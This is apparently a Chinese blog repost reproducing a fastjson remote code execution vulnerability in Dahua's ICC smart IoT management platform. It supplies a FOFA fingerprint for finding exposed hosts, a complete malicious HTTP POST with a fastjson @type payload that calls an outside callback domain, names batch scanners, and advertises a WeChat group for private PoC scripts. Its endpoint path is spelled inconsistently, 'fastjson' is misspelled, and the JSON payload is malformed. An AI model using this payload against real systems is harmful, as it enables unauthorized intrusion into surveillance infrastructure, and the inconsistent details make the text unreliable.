本文主要是介绍【漏洞复现】大华智能物联综合管理平台 fastjson远程代码执行漏洞,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
0x01 产品简介
大华ICC智能物联综合管理平台对技术组件进行模块化和松耦合,将解决方案分层分级,提高面向智慧物联的数据接入与生态合作能力。
0x02 漏洞概述
由于大华智能物联综合管理平台使用了存在漏洞的Fastson组件,未经身份验让的攻击者可利用 /ev0-uns/v1.0/auths/sysusers/random接口发送恶意的序列化数据执行任意指令,造成代码执行。
0x03 搜索语法
FOFA:icon_hash="-1935899595"
0x04 漏洞复现
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json;charset=utf-8
Accept-Encoding: gzip
Connection: close{"a":{"@type":"com.alibaba.fastjson.JSONObject",{"@type":"java.net.URL","val":"http://asvjwdpldi.dgrh3.cn"}}""
}
0x05 工具批量
nuclei
afrog
xray
POC脚本获取
请使用VX扫一扫加入内部POC
脚本分享圈子
这篇关于【漏洞复现】大华智能物联综合管理平台 fastjson远程代码执行漏洞的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!